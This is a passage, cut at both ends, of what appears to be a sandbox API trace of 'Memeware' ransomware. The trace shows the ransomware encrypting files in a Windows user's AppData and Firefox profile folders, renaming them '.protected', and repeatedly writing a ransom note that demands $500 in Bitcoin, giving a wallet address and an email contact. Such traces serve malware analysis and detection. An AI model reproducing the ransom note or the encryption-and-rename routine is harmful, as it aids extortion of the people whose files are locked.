lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0091.027] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.027] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0091.027] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0091.028] CloseHandle (hObject=0x154) returned 1 [0091.028] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite.protected") returned 121 [0091.028] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webappsstore.sqlite"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webappsstore.sqlite.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webappsstore.sqlite.protected")) returned 1 [0091.029] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0091.029] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0091.029] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\RESTORE_FILES.txt") returned 109 [0091.029] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0091.029] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.029] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0091.030] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0091.030] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0091.030] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.030] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0091.030] CloseHandle (hObject=0x150) returned 1 [0091.030] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0091.030] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0091.030] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\RESTORE_FILES.txt") returned 92 [0091.030] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0091.031] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.031] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0091.031] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0091.032] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0091.032] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.032] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0091.032] CloseHandle (hObject=0x14c) returned 1 [0091.033] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0091.033] lstrcmpiW (lpString1="profiles.ini", lpString2="Windows") returned -1 [0091.033] lstrcmpiW (lpString1="profiles.ini", lpString2="Program Files") returned -1 [0091.033] lstrcmpiW (lpString1="profiles.ini", lpString2="Program Files (x86)") returned -1 [0091.033] lstrcmpiW (lpString1="profiles.ini", lpString2="$Recycle.bin") returned 1 [0091.033] lstrcmpiW (lpString1="profiles.ini", lpString2="System Volume Information") returned -1 [0091.033] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini") returned 78 [0091.033] StrStrIW (lpFirst="profiles.ini", lpSrch=".protected") returned 0x0 [0091.033] lstrcmpW (lpString1="profiles.ini", lpString2="RESTORE_FILES.txt") returned -1 [0091.033] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0091.033] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0091.033] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0091.034] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini") returned 78 [0091.034] StrStrW (lpFirst="profiles.ini", lpSrch=".txt") returned 0x0 [0091.034] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini") returned 78 [0091.034] StrStrW (lpFirst="profiles.ini", lpSrch=".rar") returned 0x0 [0091.034] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini") returned 78 [0091.034] StrStrW (lpFirst="profiles.ini", lpSrch=".zip") returned 0x0 [0091.034] ReadFile (in: hFile=0x14c, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ea24*=0x6f, lpOverlapped=0x0) returned 1 [0091.035] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffff91, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.035] WriteFile (in: hFile=0x14c, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x6f, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ea24*=0x6f, lpOverlapped=0x0) returned 1 [0091.035] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.035] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0091.035] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0091.035] CloseHandle (hObject=0x14c) returned 1 [0091.036] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini.protected") returned 88 [0091.036] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini.protected")) returned 1 [0091.037] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0091.037] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0091.037] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\RESTORE_FILES.txt") returned 83 [0091.037] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0091.044] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.044] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0091.051] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0091.051] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0091.051] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.051] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0091.051] CloseHandle (hObject=0xd8) returned 1 [0091.051] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0091.051] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0091.051] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\RESTORE_FILES.txt") returned 75 [0091.051] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.052] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.052] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0091.052] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0091.052] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0091.052] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.053] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0091.053] CloseHandle (hObject=0xd4) returned 1 [0091.053] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.053] lstrcmpiW (lpString1="M_rWoVKTtbG.avi", lpString2="Windows") returned -1 [0091.053] lstrcmpiW (lpString1="M_rWoVKTtbG.avi", lpString2="Program Files") returned -1 [0091.053] lstrcmpiW (lpString1="M_rWoVKTtbG.avi", lpString2="Program Files (x86)") returned -1 [0091.053] lstrcmpiW (lpString1="M_rWoVKTtbG.avi", lpString2="$Recycle.bin") returned 1 [0091.053] lstrcmpiW (lpString1="M_rWoVKTtbG.avi", lpString2="System Volume Information") returned -1 [0091.053] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\M_rWoVKTtbG.avi") returned 65 [0091.053] StrStrIW (lpFirst="M_rWoVKTtbG.avi", lpSrch=".protected") returned 0x0 [0091.053] lstrcmpW (lpString1="M_rWoVKTtbG.avi", lpString2="RESTORE_FILES.txt") returned -1 [0091.053] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.053] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.053] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\M_rWoVKTtbG.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\m_rwovkttbg.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.053] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\M_rWoVKTtbG.avi") returned 65 [0091.053] StrStrW (lpFirst="M_rWoVKTtbG.avi", lpSrch=".txt") returned 0x0 [0091.053] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\M_rWoVKTtbG.avi") returned 65 [0091.053] StrStrW (lpFirst="M_rWoVKTtbG.avi", lpSrch=".rar") returned 0x0 [0091.053] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\M_rWoVKTtbG.avi") returned 65 [0091.053] StrStrW (lpFirst="M_rWoVKTtbG.avi", lpSrch=".zip") returned 0x0 [0091.053] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.054] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.054] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.055] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.055] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, 